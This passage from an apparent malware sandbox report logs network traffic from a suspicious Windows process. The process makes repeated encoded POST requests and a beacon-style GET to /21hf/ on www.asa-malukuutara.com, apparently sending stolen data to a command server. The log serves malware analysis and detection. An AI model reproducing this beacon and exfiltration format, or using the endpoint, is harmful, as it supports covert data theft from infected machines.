                                                Aug 27, 2024 07:58:24.994126081 CEST1289INData Raw: 91 48 45 f0 a0 42 30 f7 87 85 a8 10 ee 13 87 74 4b 53 53 d3 4e 5b 2a 1b 1c c3 cb 60 6f 86 08 37 30 c9 bd 5a c3 f0 40 e7 93 0b 12 f3 82 37 97 93 0b 0e f3 a2 d1 01 a7 10 58 aa ce db f1 f8 c6 59 2c 0e 48 47 e7 48 aa 3b 45 98 ac 9b dc fe 7d b7 95 fd
                                                Data Ascii: HEB0tKSSN[*`o70Z@7XY,HGH;E}vLj[)+qIl={l]J,3OLT5M/mO;Q$Ga-40OgqI#)]L>9.cE5N0g3u~uzf}Z0fRs3VK:
                                                Aug 27, 2024 07:58:24.994276047 CEST1289INData Raw: 5d 3a 8d a3 8b 54 e1 4f a8 be 8d f5 46 78 3d 65 b0 e6 69 5d c0 75 b6 69 ea 4d e2 02 93 84 42 2f ae 1b 46 85 8f 9e d6 05 5c e7 ba 11 db 9a bf 41 41 01 22 67 a0 f0 d1 d3 a4 80 eb e5 26 11 da 9d 60 e5 02 36 45 b4 1c 3a a2 c1 c1 ec be 9b 65 d6 e5 f1
                                                Data Ascii: ]:TOFx=ei]uiMB/F\AA"g&`6E:eyfi4A^ew18@j4]FDZ<<Q_NNlG*,wK5R"H[$$Y39-Zm:DARr"r^=8<'"_p97o%ID+V&w!
                                                Aug 27, 2024 07:58:24.994395971 CEST1289INData Raw: bc 58 8c 8d cf 01 c2 81 e5 92 d6 1b ca bc 3a 31 48 af c2 6d 32 51 b2 0a 1b 84 58 48 40 0d ca f7 23 ad 3c d7 3a c7 14 f6 db 38 14 b8 0b bc 0f 08 8c f7 ed 70 d2 58 b0 b6 83 e4 ef 80 9d 1a 22 d0 68 2a 58 8d 80 c9 16 c6 8b 3d a8 c6 5a d3 f1 62 0d b7
                                                Data Ascii: X:1Hm2QXH@#<:8pX"h*X=Zb1uaB"Pc>`p!Qpo!W-Kl0k #l-Kz7zW1.V<kS+usl-"Uze6*dTDFv.).96H+]A
                                                Aug 27, 2024 07:58:24.994467974 CEST1289INData Raw: 8b 97 6b 5e 67 c7 33 68 fa 18 1e da fe 14 c7 df dd 6e cd 66 42 96 37 09 ce 9d cb a7 90 61 2d 4d 6c a7 ec 7c f4 f0 d2 5c 35 e6 af cc 72 eb 84 fa af 21 dc 08 64 2f a3 41 a7 ef 92 ed 41 fb 6b b7 96 d7 b9 2b 70 6b dc ad 37 17 77 d2 45 f0 4c 36 bc 26
                                                Data Ascii: k^g3hnfB7a-Ml|\5r!d/AAk+pk7wEL6&Y*FL}T8OmLwb1%T6nc"].nyt:*jq`|?$%5n9=kFq>fKe_jo2C+yaYnchj&~|G7/>y\[
                                                Aug 27, 2024 07:58:24.994529963 CEST1289INData Raw: 13 39 5d 31 e8 6d 00 7f e7 2f 5f f2 76 f3 be b8 6b 6e 24 7e 34 78 e6 3e 28 62 19 94 b7 04 cd 40 bb 07 dc b5 af 99 f1 b9 e2 95 f4 76 76 56 79 6d c0 ba 62 31 23 fb a9 79 4f fa 6a 54 0d 86 c2 6f db 21 15 e1 e9 e7 81 be b8 be 23 21 ac 0b 7c 5c fc da
                                                Data Ascii: 9]1m/_vkn$~4x>(b@vvVymb1#yOjTo!#!|\#ICZzY~=yPtykA}/GJw$5F3"E?8t6bQv3x\o4,*v#+8c
                                                Aug 27, 2024 07:58:24.994599104 CEST1289INData Raw: fd 18 a7 89 02 53 4a 07 7b 45 08 55 9d 08 da 13 5e af a4 43 b7 44 04 d9 be d5 77 5e 1c 94 29 a8 40 88 20 80 a3 cf cb 0b 42 05 fa a2 bb 23 9a 16 2b c1 5b 10 99 91 bd 72 b2 9c 0c 56 48 ca 14 06 47 80 2e 83 83 5d 3e 45 69 e8 cd 59 af 9b e2 54 58 47
                                                Data Ascii: SJ{EU^CDw^)@ B#+[rVHG.]>EiYTXG}}R\4cqkw'A_[;[$*&T}.si#jsvHS>~YV)(f)L?B1e,(\6WPc^2
                                                Aug 27, 2024 07:58:24.994702101 CEST1289INData Raw: 02 f8 b3 6f 4d 5d 52 a2 10 ab 38 7a 61 f4 be ef c6 d4 dc 29 70 95 00 24 df 73 55 7b f8 f1 f3 3e 61 b6 bc ef 8a 2e ff 63 3d f6 b5 51 ed 72 27 46 5e be 61 63 8a 8b 0c be 8c 4c 7a 97 44 55 20 05 15 7e 67 a0 a4 7c e0 43 e7 3e 34 d8 d9 1d 99 da f7 b3
                                                Data Ascii: oM]R8za)p$sU{>a.c=Qr'F^acLzDU ~g|C>4cfk3y}oz?rj)!clTv@K ~Nnj\1J$?YGP{HU>Q]iQhgLQl%IBj%nXyS'(
                                                Aug 27, 2024 07:58:24.994793892 CEST30INData Raw: a1 be 75 d3 7d 3c 4c 53 59 0a 06 e7 50 d9 ec 65 29 be 2c 4d 51 49 67 16 88 cc d9 27 88 e6
                                                Data Ascii: u}<LSYPe),MQIg'


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.11.2049843103.247.8.53807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:27.337610006 CEST1175OUTPOST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 4c 50 31 46 67 58 41 7a 32 52 76 75 78 35 4a 46 6e 66 67 68 58 4d 68 45 7a 74 54 4d 4b 58 46 62 66 4c 35 43 33 45 4a 63 6c 31 39 77 56 36 33 6b 4b 5a 70 58 41 36 76 4a 55 31 34 38 2f 71 6e 2f 66 49 30 54 65 32 52 2b 7a 62 34 4c 76 6d 2b 56 66 53 65 42 48 55 7a 61 7a 6a 42 2f 4b 56 56 64 38 64 6f 53 42 2b 68 6f 77 69 46 7a 59 6b 52 79 59 63 6c 35 4b 4c 6c 74 39 6e 53 61 76 58 31 54 74 53 79 61 64 43 54 62 32 57 37 47 50 6a 58 6a 6a 78 4e 36 45 55 4e 6b 4c 61 57 56 54 75 70 66 46 72 74 6f 56 6d 70 78 36 77 62 33 59 49 47 4c 61 6c 48 77 4c 41 6d 74 47 65 43 56 55 61 74 42 61 79 76 31 72 70 4b 41 69 57 49 6d 47 65 43 73 67 5a 4e 77 70 78 75 75 56 59 70 64 52 6c 4c 44 47 7a 77 7a 48 66 71 75 61 5a 4f 35 4b 4b 50 61 69 72 35 55 5a 46 32 33 61 77 52 61 64 56 44 59 78 77 39 37 37 36 30 64 71 76 54 61 73 52 4d 6b 49 48 55 2f 41 59 79 58 6f 4f 4a 50 78 4c 4a 34 [TRUNCATED]
                                                Data Ascii: ij60MtY=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqLP1FgXAz2Rvux5JFnfghXMhEztTMKXFbfL5C3EJcl19wV63kKZpXA6vJU148/qn/fI0Te2R+zb4Lvm+VfSeBHUzazjB/KVVd8doSB+howiFzYkRyYcl5KLlt9nSavX1TtSyadCTb2W7GPjXjjxN6EUNkLaWVTupfFrtoVmpx6wb3YIGLalHwLAmtGeCVUatBayv1rpKAiWImGeCsgZNwpxuuVYpdRlLDGzwzHfquaZO5KKPair5UZF23awRadVDYxw97760dqvTasRMkIHU/AYyXoOJPxLJ4vYyBmYBoCS0ikqOt4o7y9FZU/C5m5HQbeJU0f60bBxL5tRmNqK8kswXGyFUjPKp3TW4byKGoUqK1a4wqb+SmXQUy1Ir8HBiWYMdfbnVpKgPuf7PMCM1Hi5ckmHOiqUJJMjCgo8XQ+0a6mqZNWvyvEJ3Bk4LPMOBBKv26s0X8cMwgMJgxK+SfI5Z4VnrlVpdUBfvmcxPIhniCo=
                                                Aug 27, 2024 07:58:28.598814964 CEST30INData Raw: a1 be 75 d3 7d 3c 4c 53 59 0a 06 e7 50 d9 ec 65 29 be 2c 4d 51 49 67 16 88 cc d9 27 88 e6
                                                Data Ascii: u}<LSYPe),MQIg'
                                                Aug 27, 2024 07:58:29.685707092 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:58:27 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb [TRUNCATED]
                                                Data Ascii: SAI?TM||}grz+ "Cw^\LoK"9dage^=$y$,zd{`,blpyza7 J1LkDDE@M{c`Fy1AU"fBbC) u[9WDb]kWHwsOBoPsYXE]SW*K`[|L,A:$4./S=p,;<{I^Z4Cz[b/=SUS<(2i\!o);nb@.b~#D "fynmn)t<u4&{i)D<"aEOa&/|AQ"v8Giv~mo2j8Oyv)|q1tJW~JYr^h'q0)r}om8%0O{]{$m|yWh"O-?O{U;^-/i<N+x*}';)*Z$vu:`w}'%/|$Uof;R^l?*LlBj*5TM*?Ow?qX+Q2mEO&cFOy:TeK[Cko.r%+6[ZMtAmMo(KM9&A-]\w-"\ftS\4N


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.11.2049844103.247.8.53807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:30.216247082 CEST2578OUTPOST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 44 50 31 7a 73 58 41 53 32 52 75 75 78 35 42 6c 6e 43 67 68 57 4f 68 45 62 70 54 4d 57 74 46 5a 58 4c 35 78 2f 45 4b 75 4e 31 36 77 56 2f 34 45 4b 58 74 58 41 75 76 4a 59 70 34 38 37 36 6e 50 37 49 31 54 75 32 56 4d 62 45 67 4c 75 6a 2b 56 66 57 4a 78 48 63 7a 61 48 4a 42 36 53 56 56 66 49 64 70 68 35 2b 6d 2f 63 69 64 54 59 72 49 69 59 74 2b 4a 4b 71 6c 74 35 5a 53 61 76 74 31 53 5a 53 79 5a 56 43 42 4b 32 52 37 6d 50 6a 49 54 6a 79 47 61 49 75 4e 6b 48 43 57 56 50 75 70 66 74 72 73 49 56 6d 69 77 36 7a 62 58 59 4f 43 4c 62 7a 44 77 48 59 6d 74 36 4b 43 55 41 61 74 56 79 79 73 69 2f 70 46 45 4f 57 55 32 47 59 4d 4d 67 47 48 51 70 74 75 74 73 37 70 64 78 54 4c 41 4b 7a 69 42 50 66 38 61 4f 59 4a 5a 4b 45 44 36 69 6c 76 6b 56 4a 32 33 4c 78 52 61 63 59 44 5a 31 77 2b 4c 4c 36 7a 76 43 73 51 4b 74 58 45 45 4a 48 65 66 4d 47 79 58 30 77 4a 4d 68 62 4a 2f [TRUNCATED]
                                                Data Ascii: ij60MtY=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqDP1zsXAS2Ruux5BlnCghWOhEbpTMWtFZXL5x/EKuN16wV/4EKXtXAuvJYp4876nP7I1Tu2VMbEgLuj+VfWJxHczaHJB6SVVfIdph5+m/cidTYrIiYt+JKqlt5ZSavt1SZSyZVCBK2R7mPjITjyGaIuNkHCWVPupftrsIVmiw6zbXYOCLbzDwHYmt6KCUAatVyysi/pFEOWU2GYMMgGHQptuts7pdxTLAKziBPf8aOYJZKED6ilvkVJ23LxRacYDZ1w+LL6zvCsQKtXEEJHefMGyX0wJMhbJ/3YyhmYELaT8SliHN42/y9SZT2r5kUyQoKJVEP6l7ByNZtN/dqIuUswXG+3UjzKqG7WiIaKA+cqM1bSwqaiSjOgUy8pr82qiS8McNjnUoKjE+f+d8CbxHv/ckqcOhCEcrIjDg48TQ+7KqmheNW5lfY83BooLP5DBG2v28l1SNQNpTFFnwyKRusxTZZCm151Tjh/nkAiKr5812UkaenMud1ARxWZlXeEnqFIE42eXR55cLW++m5NiT6xwxElCiWnNlczAgMgVtLlpYEzhNr5f8et+3cefPgMYr6VBK5EPodiAahri0+Dwc934bjgQvjJbU2wyE8AAPrYHdXNIl4snL+zPvXG2xi3m9XuBHYDRjHRX4m70o6xXiNY+Gwd8BNfF/ilgw1rtMiIeBuJUPIxBiYh/IESgERhv+ENq7ALg/Tnxq9WZBuNjHkadWTsGjuR3wJU6oZVeMJoDuoKOodiIi/+rHkxTl8eVd13CM84R6TjX3w/PKacgUntRli2gNXHsB2tmddwqaC6ri442VU5XhoQOsgCruOtDE1Gg09YCX7dsCihxfVwF+bkxULSCilSgY+6fNGXnUe5OsKJUzY0bSczUz5sCoUytuf93qtvqzI93veJcvHg9c/vW79CWOPKv+FxcK7sdnZv0m61IVhTwtZ1GwsovHN+2i2/ [TRUNCATED]
                                                Aug 27, 2024 07:58:30.216377020 CEST10312OUTData Raw: 32 68 6a 37 66 41 4b 67 4d 4e 63 71 35 36 52 79 72 35 77 4f 73 52 77 6d 34 71 58 49 6a 2f 55 71 49 48 64 5a 44 6d 52 65 35 6c 64 55 4e 46 44 43 36 4b 50 69 70 79 31 71 6d 62 4e 43 30 64 2b 70 30 7a 30 52 50 53 58 68 74 4e 63 51 53 41 42 69 54 32
                                                Data Ascii: 2hj7fAKgMNcq56Ryr5wOsRwm4qXIj/UqIHdZDmRe5ldUNFDC6KPipy1qmbNC0d+p0z0RPSXhtNcQSABiT2qsmMe5mIp2u6T5hDnHdFvCBAx+8nXHwAecn2tFovnDfqdDEibzQlB8Qrj9JA/kLFYpj95UqoPFFv5goDo1TOWaLui+Bp3635oBPVVlqUnQRMo/OvSjVFrBnu39R5kuXo3fBRRm0B3w4VSXAgNzuGPkShAVeqoxs0d
                                                Aug 27, 2024 07:58:30.561454058 CEST2578OUTData Raw: 45 6f 4a 38 72 32 76 69 65 5a 70 73 75 45 6f 48 33 38 4d 4f 58 67 61 79 44 33 54 4b 31 43 52 6c 6b 38 56 48 43 6f 65 45 42 6e 61 4a 55 2f 64 2f 6c 59 43 73 47 52 71 75 30 50 6b 72 61 54 33 67 68 6d 54 6a 2b 79 37 75 6b 50 64 4b 4f 78 47 64 45 54
                                                Data Ascii: EoJ8r2vieZpsuEoH38MOXgayD3TK1CRlk8VHCoeEBnaJU/d/lYCsGRqu0PkraT3ghmTj+y7ukPdKOxGdETZHwMR60ARKUytHB+Hfp4MlM6+zj81pEZloqg3mioKAyHjQXHkADTF0mfnybDtfUROxpuSu/O1FWCsDZKk09FAd7a8xbXrsrZmGE5fQNNO/hJNGEkHAmTN0pZY6bPYGFdBsfi/FHE6BoxgZCKv+LuqxD/aQDALA5u6
                                                Aug 27, 2024 07:58:30.561651945 CEST1289OUTData Raw: 4f 4a 73 41 50 61 79 35 32 67 49 54 77 2b 74 45 33 30 4e 4e 58 68 63 77 35 74 4f 38 44 47 73 4e 37 79 79 48 6f 4d 67 75 36 61 44 64 42 77 55 41 6a 6b 75 6f 6c 37 68 41 68 74 66 35 62 35 34 37 47 4b 52 35 5a 31 6d 72 64 50 68 59 68 4a 37 71 42 66
                                                Data Ascii: OJsAPay52gITw+tE30NNXhcw5tO8DGsN7yyHoMgu6aDdBwUAjkuol7hAhtf5b547GKR5Z1mrdPhYhJ7qBfnNV1MJpBnhWjrdOsRJRtvPHA6MhDN9t5Wr1VVjQPmxA0beJg7GzvO0H1pBoSK1Nlc7xBt+6J7C1r+yMT91/65ck7MU0Rf9NlOO2Fg6Cg9wRwbV5Z0xHHDbPpGJ6gPy+LWdGsbM3w5o1DIPUgf32p4sb+JssBynBzq
                                                Aug 27, 2024 07:58:30.561841965 CEST16757OUTData Raw: 2b 69 78 78 38 63 46 36 6f 73 71 2f 58 39 6e 62 64 71 70 7a 70 78 65 35 62 4e 4f 4c 70 55 51 56 70 2b 65 39 35 36 36 74 75 52 41 63 67 31 78 6f 2f 48 42 5a 72 55 47 4e 56 2f 6f 77 47 47 46 4a 50 67 41 6a 2f 53 46 46 48 54 47 42 38 63 2b 71 6b 72
                                                Data Ascii: +ixx8cF6osq/X9nbdqpzpxe5bNOLpUQVp+e9566tuRAcg1xo/HBZrUGNV/owGGFJPgAj/SFFHTGB8c+qkr4ZMsayHafihR5PY01r8nNmb5JjxBaNXm9hGk4/fkIfxfrjThx/vJ50jSftmrwAQaNvtKvx4+94zqBKGHUUxpG3rw66LqszaPWIYqKwCq0Kd9+esTKE2ytpLCJfARtdIG6Jg7PRsUUlij/JUaEUisqlhDka+sB4E2+
                                                Aug 27, 2024 07:58:30.561994076 CEST5156OUTData Raw: 46 46 58 68 2f 43 2f 50 55 7a 39 6a 4d 4f 39 75 78 38 76 5a 30 73 75 4c 77 45 68 76 42 6a 6d 7a 78 2b 55 64 72 49 35 46 71 79 65 5a 37 51 32 32 73 4b 30 4d 39 67 64 77 43 57 31 63 66 64 33 4b 53 67 2f 76 7a 39 70 33 61 7a 7a 66 76 73 35 76 37 67
                                                Data Ascii: FFXh/C/PUz9jMO9ux8vZ0suLwEhvBjmzx+UdrI5FqyeZ7Q22sK0M9gdwCW1cfd3KSg/vz9p3azzfvs5v7gu+XUs5ccQguPH86g6rjmflv6TqrTA87nuh1v1cQ0PBQS4O4b8NC3jpp+XzhErIa5t7nLpyHBzozqI15wVucnnfT4wjXuG8botvBtLusGVrVduf4rqjUEq5GhgEwGvqzT0gD1TwL8XHzIM5+Rpmhuc/3zCueCOoxWH
                                                Aug 27, 2024 07:58:30.906685114 CEST2578OUTData Raw: 7a 39 53 44 75 39 6e 79 71 71 61 45 47 6a 73 43 57 2f 2f 71 66 36 32 6e 50 66 4c 4b 6c 34 63 68 4c 42 68 6c 73 64 76 48 34 54 73 75 50 31 32 64 4a 47 4e 66 6d 70 61 46 69 34 72 48 49 56 4e 46 47 4c 6b 46 46 70 37 37 57 42 4d 41 7a 34 76 4e 44 47
                                                Data Ascii: z9SDu9nyqqaEGjsCW//qf62nPfLKl4chLBhlsdvH4TsuP12dJGNfmpaFi4rHIVNFGLkFFp77WBMAz4vNDG4GGfS+ivTfLnfqyaGP2b1R8ZwhBDtuozp5iA9nJRTjrTOPsn5DlD3Y6zGIXV6SPesODbQOt5E0iI8kO3D0mHcWKxds/P1cIryFdwJ/U4h3ptV++Dv4ICygMX/Z9BYQjJs4BYIfZRY5ANafVOCjYHi1yCdb5jB7f0+
                                                Aug 27, 2024 07:58:30.906780958 CEST2578OUTData Raw: 54 42 73 31 4a 6f 5a 78 64 7a 2b 51 41 50 77 55 32 66 36 44 78 5a 48 64 32 61 7a 6b 44 71 6e 56 37 43 76 4b 35 33 76 63 65 77 4e 68 57 78 49 6c 6d 34 73 38 6e 56 6c 42 76 71 68 63 38 44 2f 74 45 71 56 36 6c 67 58 6b 38 32 4a 4c 32 78 6e 76 39 35
                                                Data Ascii: TBs1JoZxdz+QAPwU2f6DxZHd2azkDqnV7CvK53vcewNhWxIlm4s8nVlBvqhc8D/tEqV6lgXk82JL2xnv95zd1pATpoJcOHS+yVRkN246awEcyEjPDdzPlmIG5hAPqvn4auNQSiCExk1si03cufNXPXOJG0uADgQSDFDoX69qQRrn/t5Fff8JIZIMgXOMgndpT/P+7V+giJzXB5wL0kE8FbARpIF3BVNP0xN8qhIf3n1kRuTkvgj
                                                Aug 27, 2024 07:58:30.906955957 CEST5156OUTData Raw: 78 51 61 67 2f 42 30 2f 6e 6a 54 73 56 77 64 4c 38 4a 33 68 6a 52 66 75 32 66 55 2b 67 33 67 62 4b 41 72 37 48 55 67 74 73 74 79 62 6b 30 4d 37 75 67 4d 70 75 44 2b 73 69 5a 77 52 64 70 45 4f 47 4c 64 4b 53 64 68 56 70 6f 61 6c 5a 59 45 62 79 47
                                                Data Ascii: xQag/B0/njTsVwdL8J3hjRfu2fU+g3gbKAr7HUgtstybk0M7ugMpuD+siZwRdpEOGLdKSdhVpoalZYEbyGdBDAK1qqdBaJ9c9X4IITtpHAzyGuJCpridmtp+owtruCDtP5gFIrWBxrsnGUFoSftFwq1sdGs/gqZsMkaIfibhd9uisCkzY5ayJeZVkGo8QkmRGBjK/hkXuEli7PbTcFj3d5LDtWwuv5RmG1/LbL7BCB5JPnKtr0p
                                                Aug 27, 2024 07:58:30.907129049 CEST4583OUTData Raw: 61 2b 75 59 7a 66 2f 6c 38 54 58 57 31 4e 6f 6d 43 41 76 4d 55 39 78 42 63 4e 56 43 51 57 59 56 53 47 75 46 37 5a 56 70 4b 63 73 48 6e 79 6c 34 6c 65 4d 51 63 45 76 6d 32 63 78 66 6a 75 62 4b 52 69 4c 6f 6c 76 79 4d 68 33 4f 76 77 4f 50 75 44 6a
                                                Data Ascii: a+uYzf/l8TXW1NomCAvMU9xBcNVCQWYVSGuF7ZVpKcsHnyl4leMQcEvm2cxfjubKRiLolvyMh3OvwOPuDjjI+DHFmqdExyduRba0Tgd4Ap4nnJHpxz8OILWyoeRt7V9FLy+T3lOSb1o4PkWCV0c+C9g9fjNIpIPBIyGGShS8Vl64KNH5kckYMT15NQSn26fl5zi6AMcGy7YqNDJX++7bJYNHWHOampN8NB8zSuUomhui5mI/7Wn
                                                Aug 27, 2024 07:58:31.276694059 CEST1289OUTData Raw: 6d 72 75 71 74 6d 64 42 6d 59 65 34 4c 52 71 6c 46 53 58 4b 61 48 70 36 76 68 76 42 54 43 62 4a 62 50 4d 74 46 7a 50 50 34 6d 76 47 6f 47 57 53 65 78 35 69 52 79 71 76 30 61 67 48 46 59 54 67 57 58 50 39 41 6b 70 53 50 44 45 75 30 63 64 62 70 31
                                                Data Ascii: mruqtmdBmYe4LRqlFSXKaHp6vhvBTCbJbPMtFzPP4mvGoGWSex5iRyqv0agHFYTgWXP9AkpSPDEu0cdbp17Vl8tGrCeZPnbdetsF5ehgi9It158assoOdjnlpCfFyGgrHRqPJ55tawgR++sKuD8oyH8bwlCVIyusXzU3G+0jMuKVBnCa/Gd5usxBQJdQc4lG3b9szcnbml7AjzaBdIpoSwb4dzunuqrLgI0k4ZGyVmcLfj+jZNP
                                                Aug 27, 2024 07:58:32.565346956 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:58:30 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb [TRUNCATED]
                                                Data Ascii: SAI?TM||}grz+ "Cw^\LoK"9dage^=$y$,zd{`,blpyza7 J1LkDDE@M{c`Fy1AU"fBbC) u[9WDb]kWHwsOBoPsYXE]SW*K`[|L,A:$4./S=p,;<{I^Z4Cz[b/=SUS<(2i\!o);nb@.b~#D "fynmn)t<u4&{i)D<"aEOa&/|AQ"v8Giv~mo2j8Oyv)|q1tJW~JYr^h'q0)r}om8%0O{]{$m|yWh"O-?O{U;^-/i<N+x*}';)*Z$vu:`w}'%/|$Uof;R^l?*LlBj*5TM*?Ow?qX+Q2mEO&cFOy:TeK[Cko.r%+6[ZMtAmMo(KM9&A-]\w-"\ftS\4N


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.11.2049845103.247.8.53807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:33.097264051 CEST553OUTGET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:33.565958977 CEST518INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:58:33 GMT
                                                Server: Apache
